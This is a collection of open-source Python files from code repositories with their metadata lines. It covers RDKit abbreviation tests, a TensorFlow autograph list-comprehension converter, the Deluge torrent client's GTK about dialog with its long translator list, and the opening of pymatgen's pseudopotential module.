OiBu OCC(C)C
tBu C(C)(C)C'''
abbrevs = rdAbbreviations.ParseAbbreviations(defn)
m = Chem.MolFromSmiles('CCC(=O)OCC')
nm = rdAbbreviations.CondenseMolAbbreviations(m, abbrevs, maxCoverage=1.0)
self.assertEqual(Chem.MolToCXSmiles(nm), '*CC |$CO2Et;;$|')
def testCondense(self):
m = Chem.MolFromSmiles('FC(F)(F)CC(=O)O')
nm = rdAbbreviations.CondenseMolAbbreviations(m, self.defaultAbbrevs, maxCoverage=1.0)
self.assertEqual(Chem.MolToCXSmiles(nm), '*C* |$CF3;;CO2H$|')
m = Chem.MolFromSmiles('CCC(F)(F)F')
nm = rdAbbreviations.CondenseMolAbbreviations(m, self.defaultAbbrevs)
self.assertEqual(Chem.MolToCXSmiles(nm), '*C(F)(F)F |$Et;;;;$|')
# make sure we don't mess up chirality
m = Chem.MolFromSmiles('FC(F)(F)[C@](Cl)(F)I')
nm = rdAbbreviations.CondenseMolAbbreviations(m, self.defaultAbbrevs, maxCoverage=1.0)
self.assertEqual(Chem.MolToCXSmiles(nm), '*[C@@](F)(Cl)I |$CF3;;;;$|')
def testLabel(self):
m = Chem.MolFromSmiles('CC(C)CC(F)(F)F')
nm = rdAbbreviations.LabelMolAbbreviations(m, self.defaultAbbrevs, maxCoverage=1.0)
sgs = Chem.GetMolSubstanceGroups(nm)
self.assertEqual(len(sgs), 2)
self.assertEqual(sgs[0].GetProp('TYPE'), "SUP")
self.assertEqual(sgs[0].GetProp('LABEL'), "iPr")
self.assertEqual(list(sgs[0].GetAtoms()), [1, 0, 2])
self.assertEqual(list(sgs[0].GetBonds()), [2])
aps = sgs[0].GetAttachPoints()
self.assertEqual(len(aps), 1)
self.assertEqual(aps[0].aIdx, 1)
self.assertEqual(aps[0].lvIdx, 3)
self.assertEqual(sgs[1].GetProp('TYPE'), "SUP")
self.assertEqual(sgs[1].GetProp('LABEL'), "CF3")
self.assertEqual(list(sgs[1].GetAtoms()), [4, 5, 6, 7])
self.assertEqual(list(sgs[1].GetBonds()), [3])
aps = sgs[1].GetAttachPoints()
self.assertEqual(len(aps), 1)
self.assertEqual(aps[0].aIdx, 4)
self.assertEqual(aps[0].lvIdx, 3)
def testCondenseLinkers(self):
m = Chem.MolFromSmiles('FCOCCOCCOCCCCCCCCCCl')
nm = rdAbbreviations.CondenseMolAbbreviations(m, self.defaultLinkers, maxCoverage=1.0)
self.assertEqual(Chem.MolToCXSmiles(nm), 'FC**Cl |$;;PEG3;Hept;$|')
m = Chem.MolFromSmiles('COC1CCC(C)CC1')
nm = rdAbbreviations.CondenseMolAbbreviations(m, self.customLinkers, maxCoverage=1.0)
self.assertEqual(Chem.MolToCXSmiles(nm), 'C*OC |$;Cy;;$|')
def testAbbreviationsAndLinkers(self):
m = Chem.MolFromSmiles('COC1CCC(C)CC1')
# wouldn't normally do this in this order:
nm = rdAbbreviations.CondenseMolAbbreviations(m, self.defaultAbbrevs, maxCoverage=1.0)
self.assertEqual(Chem.MolToCXSmiles(nm), '*C1CCC(C)CC1 |$OMe;;;;;;;$|')
nm = rdAbbreviations.CondenseMolAbbreviations(nm, self.customLinkers, maxCoverage=1.0)
self.assertEqual(Chem.MolToCXSmiles(nm), '**C |$OMe;Cy;$|')
# This is a more logical order
nm = rdAbbreviations.CondenseMolAbbreviations(m, self.customLinkers, maxCoverage=1.0)
self.assertEqual(Chem.MolToCXSmiles(nm), 'C*OC |$;Cy;;$|')
nm = rdAbbreviations.CondenseMolAbbreviations(nm, self.defaultAbbrevs, maxCoverage=1.0)
self.assertEqual(Chem.MolToCXSmiles(nm), 'C*OC |$;Cy;;$|')
def testAbbreviationsSubstanceGroups(self):
m = Chem.MolFromMolBlock('''
Mrv2014 09152006492D
0 0 0 0 0 999 V3000
M V30 BEGIN CTAB
M V30 COUNTS 7 7 1 0 0
M V30 BEGIN ATOM
M V30 1 C 5.25 -5.9858 0 0
M V30 2 C 4.48 -7.3196 0 0
M V30 3 C 6.02 -7.3196 0 0
M V30 4 F 8.6873 -8.8596 0 0
M V30 5 C 7.3537 -8.0896 0 0
M V30 6 F 6.02 -8.8596 0 0
M V30 7 F 7.3537 -6.5496 0 0
M V30 END ATOM
M V30 BEGIN BOND
M V30 1 1 1 2
M V30 2 1 3 1
M V30 3 1 2 3
M V30 4 1 3 5
M V30 5 1 4 5
M V30 6 1 5 6
M V30 7 1 5 7
M V30 END BOND
M V30 BEGIN SGROUP
M V30 1 SUP 0 ATOMS=(4 4 5 6 7) SAP=(3 5 3 1) XBONDS=(1 4) LABEL=CF3
M V30 END SGROUP
M V30 END CTAB
M END''')
nm = rdAbbreviations.CondenseAbbreviationSubstanceGroups(m)
nm.RemoveAllConformers() # avoid coords in CXSMILES
self.assertEqual(Chem.MolToCXSmiles(nm), '*C1CC1 |$CF3;;;$|')
def testGithub3692(self):
defaults = rdAbbreviations.GetDefaultAbbreviations()
self.assertIsNotNone(defaults[0].mol)
lbls = [x.label for x in defaults]
self.assertIn('CO2Et', lbls)
idx = lbls.index('CO2Et')
self.assertEqual(Chem.MolToSmiles(defaults[idx].mol), '*C(=O)OCC')
if __name__ == '__main__': # pragma: nocover
unittest.main()
|
bp-kelley/rdkit
|
Code/GraphMol/Abbreviations/Wrap/testAbbreviations.py
|
Python
|
bsd-3-clause
| 5,160
|
[
"RDKit"
] |
f15b380eadae1eb1d3da7d83de5f6c3525a1905fab1e165a073c7ee457237b05
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Lowers list comprehensions into for and if statements.
Example:
result = [x * x for x in xs]
becomes
result = []
for x in xs:
elt = x * x
result.append(elt)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gast
from tensorflow.contrib.autograph.core import converter
from tensorflow.contrib.autograph.pyct import templates
# TODO(mdan): This should covert directly to operator calls.
class ListCompTransformer(converter.Base):
"""Lowers list comprehensions into standard control flow."""
def visit_Assign(self, node):
if not isinstance(node.value, gast.ListComp):
return self.generic_visit(node)
if len(node.targets) > 1:
raise NotImplementedError('multiple assignments')
target, = node.targets
list_comp_node = node.value
template = """
target = []
"""
initialization = templates.replace(template, target=target)
template = """
target.append(elt)
"""
body = templates.replace(template, target=target, elt=list_comp_node.elt)
for gen in reversed(list_comp_node.generators):
for gen_if in reversed(gen.ifs):
template = """
if test:
body
"""
body = templates.replace(template, test=gen_if, body=body)
template = """
for target in iter_:
body
"""
body = templates.replace(
template, iter_=gen.iter, target=gen.target, body=body)
return initialization + body
def transform(node, ctx):
return ListCompTransformer(ctx).visit(node)
|
jart/tensorflow
|
tensorflow/contrib/autograph/converters/list_comprehensions.py
|
Python
|
apache-2.0
| 2,297
|
[
"VisIt"
] |
968e34ad9f3c6a60715489e114b679c454567bf8c1d3c31c133f4e1657bb297d
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2007 Marcos Pinto ('markybob') <markybob@gmail.com>
#
# This file is part of Deluge and is licensed under GNU General Public License 3.0, or later, with
# the additional special exception to link portions of this program with the OpenSSL library.
# See LICENSE for more details.
#
import gtk
import pygtk
from deluge.common import get_pixmap, get_version, open_url_in_browser
from deluge.ui.client import client
from deluge.ui.gtkui.common import get_deluge_icon
pygtk.require('2.0')
class AboutDialog:
def __init__(self):
def url_hook(dialog, url):
open_url_in_browser(url)
gtk.about_dialog_set_url_hook(url_hook)
self.about = gtk.AboutDialog()
self.about.set_position(gtk.WIN_POS_CENTER)
self.about.set_name("Deluge")
self.about.set_program_name(_("Deluge"))
version = get_version()
self.about.set_copyright(_("Copyright %s-%s Deluge Team") % (2007, 2014))
self.about.set_comments(
_("A peer-to-peer file sharing program\nutilizing the BitTorrent protocol.")
+ "\n\n" + _("Client:") + " %s\n" % version)
self.about.set_version(version)
self.about.set_authors([
_("Current Developers:"), "Andrew Resch", "Damien Churchill",
"John Garland", "Calum Lind", "", "libtorrent (libtorrent.org):",
"Arvid Norberg", "", _("Past Developers or Contributors:"),
"Zach Tibbitts", "Alon Zakai", "Marcos Pinto", "Alex Dedul",
"Sadrul Habib Chowdhury", "Ido Abramovich", "Martijn Voncken"
])
self.about.set_artists(["Andrew Wedderburn", "Andrew Resch"])
self.about.set_translator_credits("\n".join([
"Aaron Wang Shi", "abbigss", "ABCdatos", "Abcx", "Actam", "Adam",
"adaminikisi", "adi_oporanu", "Adrian Goll", "afby", "Ahmades",
"Ahmad Farghal", "Ahmad Gharbeia أحمد غربية", "akira", "Aki Sivula",
"Alan Pepelko", "Alberto", "Alberto Ferrer", "alcatr4z", "AlckO",
"Aleksej Korgenkov", "Alessio Treglia", "Alexander Ilyashov",
"Alexander Matveev", "Alexander Saltykov", "Alexander Taubenkorb",
"Alexander Telenga", "Alexander Yurtsev", "Alexandre Martani",
"Alexandre Rosenfeld", "Alexandre Sapata Carbonell",
"Alexey Osipov", "Alin Claudiu Radut", "allah", "AlSim",
"Alvaro Carrillanca P.", "A.Matveev", "Andras Hipsag",
"András Kárász", "Andrea Ratto", "Andreas Johansson", "Andreas Str",
"André F. Oliveira", "AndreiF", "andrewh", "Angel Guzman Maeso",
"Aníbal Deboni Neto", "animarval", "Antonio Cono", "antoniojreyes",
"Anton Shestakov", "Anton Yakutovich", "antou",
"Arkadiusz Kalinowski", "Artin", "artir", "Astur",
"Athanasios Lefteris", "Athmane MOKRAOUI (ButterflyOfFire)",
"Augusta Carla Klug", "Avoledo Marco", "axaard", "AxelRafn",
"Axezium", "Ayont", "b3rx", "Bae Taegil", "Bajusz Tamás",
"Balaam's Miracle", "Ballestein", "Bent Ole Fosse", "berto89",
"bigx", "Bjorn Inge Berg", "blackbird", "Blackeyed", "blackmx",
"BlueSky", "Blutheo", "bmhm", "bob00work", "boenki",
"Bogdan Bădic-Spătariu", "bonpu", "Boone", "boss01",
"Branislav Jovanović", "bronze", "brownie", "Brus46", "bumper",
"butely", "BXCracer", "c0nfidencal", "Can Kaya",
"Carlos Alexandro Becker", "cassianoleal", "Cédric.h",
"César Rubén", "chaoswizard", "Chen Tao", "chicha",
"Chien Cheng Wei", "Christian Kopac", "Christian Widell",
"Christoffer Brodd-Reijer", "christooss", "CityAceE", "Clopy",
"Clusty", "cnu", "Commandant", "Constantinos Koniaris", "Coolmax",
"cosmix", "Costin Chirvasuta", "CoVaLiDiTy", "cow_2001",
"Crispin Kirchner", "crom", "Cruster", "Cybolic", "Dan Bishop",
"Danek", "Dani", "Daniel Demarco", "Daniel Ferreira",
"Daniel Frank", "Daniel Holm", "Daniel Høyer Iversen",
"Daniel Marynicz", "Daniel Nylander", "Daniel Patriche",
"Daniel Schildt", "Daniil Sorokin", "Dante Díaz", "Daria Michalska",
"DarkenCZ", "Darren", "Daspah", "David Eurenius", "davidhjelm",
"David Machakhelidze", "Dawid Dziurdzia", "Daya Adianto ", "dcruz",
"Deady", "Dereck Wonnacott", "Devgru", "Devid Antonio Filoni"
"DevilDogTG", "di0rz`", "Dialecti Valsamou", "Diego Medeiros",
"Dkzoffy", "Dmitrij D. Czarkoff", "Dmitriy Geels",
"Dmitry Olyenyov", "Dominik Kozaczko", "Dominik Lübben", "doomster",
"Dorota Król", "Doyen Philippe", "Dread Knight", "DreamSonic",
"duan", "Duong Thanh An", "DvoglavaZver", "dwori", "dylansmrjones",
"Ebuntor", "Edgar Alejandro Jarquin Flores", "Eetu", "ekerazha",
"Elias Julkunen", "elparia", "Emberke", "Emiliano Goday Caneda",
"EndelWar", "eng.essam", "enubuntu", "ercangun", "Erdal Ronahi",
"ergin üresin", "Eric", "Éric Lassauge", "Erlend Finvåg", "Errdil",
"ethan shalev", "Evgeni Spasov", "ezekielnin", "Fabian Ordelmans",
"Fabio Mazanatti", "Fábio Nogueira", "FaCuZ", "Felipe Lerena",
"Fernando Pereira", "fjetland", "Florian Schäfer", "FoBoS", "Folke",
"Force", "fosk", "fragarray", "freddeg", "Frédéric Perrin",
"Fredrik Kilegran", "FreeAtMind", "Fulvio Ciucci", "Gabor Kelemen",
"Galatsanos Panagiotis", "Gaussian", "gdevitis", "Georg Brzyk",
"George Dumitrescu", "Georgi Arabadjiev", "Georg Sieber",
"Gerd Radecke", "Germán Heusdens", "Gianni Vialetto",
"Gigih Aji Ibrahim", "Giorgio Wicklein", "Giovanni Rapagnani",
"Giuseppe", "gl", "glen", "granjerox", "Green Fish", "greentea",
"Greyhound", "G. U.", "Guillaume BENOIT", "Guillaume Pelletier",
"Gustavo Henrique Klug", "gutocarvalho", "Guybrush88",
"Hans Rødtang", "HardDisk", "Hargas Gábor",
"Heitor Thury Barreiros Barbosa", "helios91940", "helix84",
"Helton Rodrigues", "Hendrik Luup", "Henrique Ferreiro",
"Henry Goury-Laffont", "Hezy Amiel", "hidro", "hoball", "hokten",
"Holmsss", "hristo.num", "Hubert Życiński", "Hyo", "Iarwain", "ibe",
"ibear", "Id2ndR", "Igor Zubarev", "IKON (Ion)", "imen",
"Ionuț Jula", "Isabelle STEVANT", "István Nyitrai", "Ivan Petrovic",
"Ivan Prignano", "IvaSerge", "jackmc", "Jacks0nxD", "Jack Shen",
"Jacky Yeung", "Jacques Stadler", "Janek Thomaschewski", "Jan Kaláb",
"Jan Niklas Hasse", "Jasper Groenewegen", "Javi Rodríguez",
"Jayasimha (ಜಯಸಿಂಹ)", "jeannich", "Jeff Bailes", "Jesse Zilstorff",
"Joan Duran", "João Santos", "Joar Bagge", "Joe Anderson",
"Joel Calado", "Johan Linde", "John Garland", "Jojan", "jollyr0ger",
"Jonas Bo Grimsgaard", "Jonas Granqvist", "Jonas Slivka",
"Jonathan Zeppettini", "Jørgen", "Jørgen Tellnes", "josé",
"José Geraldo Gouvêa", "José Iván León Islas", "José Lou C.",
"Jose Sun", "Jr.", "Jukka Kauppinen", "Julián Alarcón",
"julietgolf", "Jusic", "Justzupi", "Kaarel", "Kai Thomsen",
"Kalman Tarnay", "Kamil Páral", "Kane_F", "kaotiks@gmail.com",
"Kateikyoushii", "kaxhinaz", "Kazuhiro NISHIYAMA", "Kerberos",
"Keresztes Ákos", "kevintyk", "kiersie", "Kimbo^", "Kim Lübbe",
"kitzOgen", "Kjetil Rydland", "kluon", "kmikz", "Knedlyk",
"koleoptero", "Kőrösi Krisztián", "Kouta", "Krakatos",
"Krešo Kunjas", "kripken", "Kristaps", "Kristian Øllegaard",
"Kristoffer Egil Bonarjee", "Krzysztof Janowski",
"Krzysztof Zawada", "Larry Wei Liu", "laughterwym", "Laur Mõtus",
"lazka", "leandrud", "lê bình", "Le Coz Florent", "Leo", "liorda",
"LKRaider", "LoLo_SaG", "Long Tran", "Lorenz", "Low Kian Seong",
"Luca Andrea Rossi", "Luca Ferretti", "Lucky LIX", "Luis Gomes",
"Luis Reis", "Łukasz Wyszyński", "luojie-dune", "maaark",
"Maciej Chojnacki", "Maciej Meller", "Mads Peter Rommedahl",
"Major Kong", "Malaki", "malde", "Malte Lenz", "Mantas Kriaučiūnas",
"Mara Sorella", "Marcin", "Marcin Falkiewicz", "marcobra",
"Marco da Silva", "Marco de Moulin", "Marco Rodrigues", "Marcos",
"Marcos Escalier", "Marcos Pinto", "Marcus Ekstrom",
"Marek Dębowski", "Mário Buči", "Mario Munda", "Marius Andersen",
"Marius Hudea", "Marius Mihai", "Mariusz Cielecki",
"Mark Krapivner", "marko-markovic", "Markus Brummer",
"Markus Sutter", "Martin", "Martin Dybdal", "Martin Iglesias",
"Martin Lettner", "Martin Pihl", "Masoud Kalali", "mat02",
"Matej Urbančič", "Mathias-K", "Mathieu Arès",
"Mathieu D. (MatToufoutu)", "Mathijs", "Matrik", "Matteo Renzulli",
"Matteo Settenvini", "Matthew Gadd", "Matthias Benkard",
"Matthias Mailänder", "Mattias Ohlsson", "Mauro de Carvalho",
"Max Molchanov", "Me", "MercuryCC", "Mert Bozkurt", "Mert Dirik",
"MFX", "mhietar", "mibtha", "Michael Budde", "Michael Kaliszka",
"Michalis Makaronides", "Michał Tokarczyk", "Miguel Pires da Rosa",
"Mihai Capotă", "Miika Metsälä", "Mikael Fernblad", "Mike Sierra",
"mikhalek", "Milan Prvulović", "Milo Casagrande", "Mindaugas",
"Miroslav Matejaš", "misel", "mithras", "Mitja Pagon", "M.Kitchen",
"Mohamed Magdy", "moonkey", "MrBlonde", "muczy", "Münir Ekinci",
"Mustafa Temizel", "mvoncken", "Mytonn", "NagyMarton", "neaion",
"Neil Lin", "Nemo", "Nerijus Arlauskas", "Nicklas Larsson",
"Nicolaj Wyke", "Nicola Piovesan", "Nicolas Sabatier",
"Nicolas Velin", "Nightfall", "NiKoB", "Nikolai M. Riabov",
"Niko_Thien", "niska", "Nithir", "noisemonkey", "nomemohes",
"nosense", "null", "Nuno Estêvão", "Nuno Santos", "nxxs", "nyo",
"obo", "Ojan", "Olav Andreas Lindekleiv", "oldbeggar",
"Olivier FAURAX", "orphe", "osantana", "Osman Tosun", "OssiR",
"otypoks", "ounn", "Oz123", "Özgür BASKIN", "Pablo Carmona A.",
"Pablo Ledesma", "Pablo Navarro Castillo", "Paco Molinero",
"Pål-Eivind Johnsen", "pano", "Paolo Naldini", "Paracelsus",
"Patryk13_03", "Patryk Skorupa", "PattogoTehen", "Paul Lange",
"Pavcio", "Paweł Wysocki", "Pedro Brites Moita",
"Pedro Clemente Pereira Neto", "Pekka \"PEXI\" Niemistö", "Penegal",
"Penzo", "perdido", "Peter Kotrcka", "Peter Skov",
"Peter Van den Bosch", "Petter Eklund", "Petter Viklund",
"phatsphere", "Phenomen", "Philipi", "Philippides Homer", "phoenix",
"pidi", "Pierre Quillery", "Pierre Rudloff", "Pierre Slamich",
"Pietrao", "Piotr Strębski", "Piotr Wicijowski", "Pittmann Tamás",
"Playmolas", "Prescott", "Prescott_SK", "pronull",
"Przemysław Kulczycki", "Pumy", "pushpika", "PY", "qubicllj",
"r21vo", "Rafał Barański", "rainofchaos", "Rajbir", "ras0ir", "Rat",
"rd1381", "Renato", "Rene Hennig", "Rene Pärts", "Ricardo Duarte",
"Richard", "Robert Hrovat", "Roberth Sjonøy", "Robert Lundmark",
"Robin Jakobsson", "Robin Kåveland", "Rodrigo Donado",
"Roel Groeneveld", "rohmaru", "Rolf Christensen", "Rolf Leggewie",
"Roni Kantis", "Ronmi", "Rostislav Raykov", "royto", "RuiAmaro",
"Rui Araújo", "Rui Moura", "Rune Svendsen", "Rusna", "Rytis",
"Sabirov Mikhail", "salseeg", "Sami Koskinen", "Samir van de Sand",
"Samuel Arroyo Acuña", "Samuel R. C. Vale", "Sanel", "Santi",
"Santi Martínez Cantelli", "Sardan", "Sargate Kanogan",
"Sarmad Jari", "Saša Bodiroža", "sat0shi", "Saulius Pranckevičius",
"Savvas Radevic", "Sebastian Krauß", "Sebastián Porta", "Sedir",
"Sefa Denizoğlu", "sekolands", "Selim Suerkan", "semsomi",
"Sergii Golovatiuk", "setarcos", "Sheki", "Shironeko", "Shlomil",
"silfiriel", "Simone Tolotti", "Simone Vendemia", "sirkubador",
"Sławomir Więch", "slip", "slyon", "smoke", "Sonja", "spectral",
"spin_555", "spitf1r3", "Spiziuz", "Spyros Theodoritsis", "SqUe",
"Squigly", "srtck", "Stefan Horning", "Stefano Maggiolo",
"Stefano Roberto Soleti", "steinberger", "Stéphane Travostino",
"Stephan Klein", "Steven De Winter", "Stevie", "Stian24", "stylius",
"Sukarn Maini", "Sunjae Park", "Susana Pereira", "szymon siglowy",
"takercena", "TAS", "Taygeto", "temy4", "texxxxxx", "thamood",
"Thanos Chatziathanassiou", "Tharawut Paripaiboon", "Theodoor",
"Théophane Anestis", "Thor Marius K. Høgås", "Tiago Silva",
"Tiago Sousa", "Tikkel", "tim__b", "Tim Bordemann", "Tim Fuchs",
"Tim Kornhammar", "Timo", "Timo Jyrinki", "Timothy Babych",
"TitkosRejtozo", "Tom", "Tomas Gustavsson", "Tomas Valentukevičius",
"Tomasz Dominikowski", "Tomislav Plavčić", "Tom Mannerhagen",
"Tommy Mikkelsen", "Tom Verdaat", "Tony Manco",
"Tor Erling H. Opsahl", "Toudi", "tqm_z", "Trapanator", "Tribaal",
"Triton", "TuniX12", "Tuomo Sipola", "turbojugend_gr", "Turtle.net",
"twilight", "tymmej", "Ulrik", "Umarzuki Mochlis", "unikob",
"Vadim Gusev", "Vagi", "Valentin Bora", "Valmantas Palikša",
"VASKITTU", "Vassilis Skoullis", "vetal17", "vicedo", "viki",
"villads hamann", "Vincent Garibal", "Vincent Ortalda", "vinchi007",
"Vinícius de Figueiredo Silva", "Vinzenz Vietzke", "virtoo",
"virtual_spirit", "Vitor Caike", "Vitor Lamas Gatti",
"Vladimir Lazic", "Vladimir Sharshov", "Wanderlust", "Wander Nauta",
"Ward De Ridder", "WebCrusader", "webdr", "Wentao Tang", "wilana",
"Wilfredo Ernesto Guerrero Campos", "Wim Champagne", "World Sucks",
"Xabi Ezpeleta", "Xavi de Moner", "XavierToo", "XChesser",
"Xiaodong Xu", "xyb", "Yaron", "Yasen Pramatarov", "YesPoX",
"Yuren Ju", "Yves MATHIEU", "zekopeko", "zhuqin", "Zissan",
"Γιάννης Κατσαμπίρης", "Артём Попов", "Миша", "Шаймарданов Максим",
"蔡查理"
]))
self.about.set_wrap_license(True)
self.about.set_license(_(
"This program is free software; you can redistribute it and/or "
"modify it under the terms of the GNU General Public License as "
"published by the Free Software Foundation; either version 3 of "
"the License, or (at your option) any later version. \n\n"
"This program "
"is distributed in the hope that it will be useful, but WITHOUT "
"ANY WARRANTY; without even the implied warranty of "
"MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU "
"General Public License for more details. \n\n"
"You should have received "
"a copy of the GNU General Public License along with this program; "
"if not, see <http://www.gnu.org/licenses>. \n\n"
"In addition, as a "
"special exception, the copyright holders give permission to link "
"the code of portions of this program with the OpenSSL library. "
"You must obey the GNU General Public License in all respects for "
"all of the code used other than OpenSSL. \n\n"
"If you modify file(s) "
"with this exception, you may extend this exception to your "
"version of the file(s), but you are not obligated to do so. If "
"you do not wish to do so, delete this exception statement from "
"your version. If you delete this exception statement from all "
"source files in the program, then also delete it here."
))
self.about.set_website("http://deluge-torrent.org")
self.about.set_website_label("deluge-torrent.org")
self.about.set_icon(get_deluge_icon())
self.about.set_logo(gtk.gdk.pixbuf_new_from_file(get_pixmap("deluge-about.png")))
if client.connected():
if not client.is_classicmode():
self.about.set_comments(
self.about.get_comments() + _("Server:") + " %coreversion%\n")
self.about.set_comments(
self.about.get_comments() + "\n" + _("libtorrent:") + " %ltversion%\n")
def on_lt_version(result):
c = self.about.get_comments()
c = c.replace("%ltversion%", result)
self.about.set_comments(c)
def on_info(result):
c = self.about.get_comments()
c = c.replace("%coreversion%", result)
self.about.set_comments(c)
client.core.get_libtorrent_version().addCallback(on_lt_version)
if not client.is_classicmode():
client.daemon.info().addCallback(on_info)
else:
client.core.get_libtorrent_version().addCallback(on_lt_version)
def run(self):
self.about.show_all()
self.about.run()
self.about.destroy()
|
bendykst/deluge
|
deluge/ui/gtkui/aboutdialog.py
|
Python
|
gpl-3.0
| 17,847
|
[
"Gaussian"
] |
7ff7edb59dfb2d03ebae0650e708dbd96d2e09b783e502d11627730450f9278d
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
This module provides objects describing the basic parameters of the
pseudopotentials used in Abinit, and a parser to instantiate pseudopotential objects..
"""
import abc
import collections
import json
import logging
import os
import sys
import numpy as np
from collections import OrderedDict, defaultdict, namedtuple
from monty.collections import AttrDict, Namespace
from tabulate import tabulate
#from monty.dev import deprecated
from monty.functools import lazy_property
from monty.itertools import iterator_from_slice
from monty.json import MSONable, MontyDecoder
from monty.os.path import find_exts
from monty.string import list_strings, is_string
from pymatgen.core.periodic_table import Element
from pymatgen.core.xcfunc import XcFunc
from pymatgen.util.serialization import pmg_serialize
from pymatgen.util.plotting import add_fig_kwargs, get_ax_fig_plt
logger = logging.getLogger(__name__)
__all__ = [
"Pseudo",
"PseudoTable",
]
__author__ = "Matteo Giantomassi"
__version__ = "0.1"
__maintainer__ = "Matteo Giantomassi"
# Tools and helper functions.
def straceback():
"""Returns a string with the traceback."""
import traceback
return "\n".join((traceback.format_exc(), str(sys.exc_info()[0])))
def _read_nlines(filename, nlines):
"""
Read at most nlines lines from file filename.
If nlines is < 0, the entire file is read.
"""
if nlines < 0:
with open(filename, 'r') as fh:
return fh.readlines()
lines = []
with open(filename, 'r') as fh:
for lineno, line in enumerate(fh):
if lineno == nlines: break
lines.append(line)
return lines
_l2str = {
0: "s",
1: "p",
2: "d",
3: "f",
4: "g",
5: "h",
6: "i",
}
_str2l = {v: k for k, v in _l2str.items()}
def l2str(l):
"""Convert the angular momentum l (int) to string."""
try:
return _l2str[l]
except KeyError:
return "Unknown angular momentum, received l = %s" % l
def str2l(s):
"""Convert a string to the angular momentum l (int)"""
return _str2l[s]
class Pseudo(MSONable, metaclass=abc.ABCMeta):
"""
Abstract base class defining the methods that must be
implemented by the concrete pseudopotential sub-classes.
"""
@classmethod
def as_pseudo(cls, obj):
"""
Convert obj into a pseudo. Accepts:
* Pseudo object.
* string defining a valid path.
"""
return obj if isinstance(obj, cls) else cls.from_file(obj)
@staticmethod
def from_file(filename):
"""
Build an instance of a concrete Pseudo subclass from filename.
Note: the parser knows the concrete class that should be instantiated
Client code should rely on the abstract interface provided by Pseudo.
"""
return PseudoParser().parse(filename)
def __eq__(self, other):
if other is None: return False
return (self.md5 == other.md5 and
self.__class__ == other.__class__ and
self.Z == other.Z and
self.Z_val == other.Z_val and
self.l_max == other.l_max )
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
try:
return "<%s at %s>" % (self.__class__.__name__, os.path.relpath(self.filepath))
except:
# relpath can fail if the code is executed in demon mode.
return "<%s at %s>" % (self.__class__.__name__, self.filepath)
def __str__(self):
return self.to_string()
def to_string(self, verbose=0):
"""String representation."""
lines = []
app = lines.append
app("<%s: %s>" % (self.__class__.__name__, self.basename))
app(" summary: " + self.summary.strip())
app(" number of valence electrons: %s" % self.Z_val)
app(" maximum angular momentum: %s" % l2str(self.l_max))
app(" angular momentum for local part: %s" % l2str(self.l_local))
app(" XC correlation: %s" % self.xc)
app(" supports spin-orbit: %s" % self.supports_soc)
if self.isnc:
app(" radius for non-linear core correction: %s" % self.nlcc_radius)
if self.has_hints:
for accuracy in ("low", "normal", "high"):
hint = self.hint_for_accuracy(accuracy=accuracy)
app(" hint for %s accuracy: %s" % (accuracy, str(hint)))
return "\n".join(lines)
@property
@abc.abstractmethod
def summary(self):
"""String summarizing the most important properties."""
@property
def filepath(self):
return os.path.abspath(self.path)
@property
def basename(self):
"""File basename."""
return os.path.basename(self.filepath)
@property
@abc.abstractmethod
def Z(self):
"""The atomic number of the atom."""
@property
@abc.abstractmethod
def Z_val(self):
"""Valence charge."""
@property
def type(self):
return self.__class__.__name__
@property
def element(self):
"""Pymatgen :class:`Element`."""
try:
return Element.from_Z(self.Z)
except (KeyError, IndexError):
return Element.from_Z(int(self.Z))
@property
def symbol(self):
"""Element symbol."""
return self.element.symbol
@property
@abc.abstractmethod
def l_max(self):
"""Maximum angular momentum."""
@property
@abc.abstractmethod
def l_local(self):
"""Angular momentum used for the local part."""
@property
def isnc(self):
"""True if norm-conserving pseudopotential."""
return isinstance(self, NcPseudo)
@property
def ispaw(self):
"""True if PAW pseudopotential."""
return isinstance(self, PawPseudo)
@lazy_property
def md5(self):
"""MD5 hash value."""
#if self.has_dojo_report and "md5" in self.dojo_report: return self.dojo_report["md5"]
return self.compute_md5()
def compute_md5(self):
"""Compute and erturn MD5 hash value."""
import hashlib
with open(self.path, "rt") as fh:
text = fh.read()
m = hashlib.md5(text.encode("utf-8"))
return m.hexdigest()
@property
@abc.abstractmethod
def supports_soc(self):
"""
True if the pseudo can be used in a calculation with spin-orbit coupling.
Base classes should provide a concrete implementation that computes this value.
"""
@pmg_serialize
def as_dict(self, **kwargs):
return dict(
basename=self.basename,
type=self.type,
symbol=self.symbol,
Z=self.Z,
Z_val=self.Z_val,
l_max=self.l_max,
md5=self.md5,
filepath=self.filepath,
#xc=self.xc.as_dict(),
)
@classmethod
def from_dict(cls, d):
new = cls.from_file(d['filepath'])
# Consistency test based on md5
if "md5" in d and d["md5"] != new.md5:
raise ValueError("The md5 found in file does not agree with the one in dict\n"
"Received %s\nComputed %s" % (d["md5"], new.md5))
return new
def as_tmpfile(self, tmpdir=None):
"""
Copy the pseudopotential to a temporary a file and returns a new pseudopotential object.
Useful for unit tests in which we have to change the content of the file.
Args:
tmpdir: If None, a new temporary directory is created and files are copied here
else tmpdir is used.
"""
import tempfile, shutil
tmpdir = tempfile.mkdtemp() if tmpdir is None else tmpdir
new_path = os.path.join(tmpdir, self.basename)
shutil.copy(self.filepath, new_path)
# Copy dojoreport file if present.
root, ext = os.path.splitext(self.filepath)
djrepo = root + ".djrepo"
if os.path.exists(djrepo):
shutil.copy(djrepo, os.path.join(tmpdir, os.path.basename(djrepo)))
# Build new object and copy dojo_report if present.
new = self.__class__.from_file(new_path)
if self.has_dojo_report: new.dojo_report = self.dojo_report.deepcopy()
return new
@property
def has_dojo_report(self):
"""True if the pseudo has an associated `DOJO_REPORT` section."""
return hasattr(self, "dojo_report") and bool(self.dojo_report)
@property
def djrepo_path(self):
"""The path of the djrepo file. None if file does not exist."""
root, ext = os.path.splitext(self.filepath)
path = root + ".djrepo"
return path
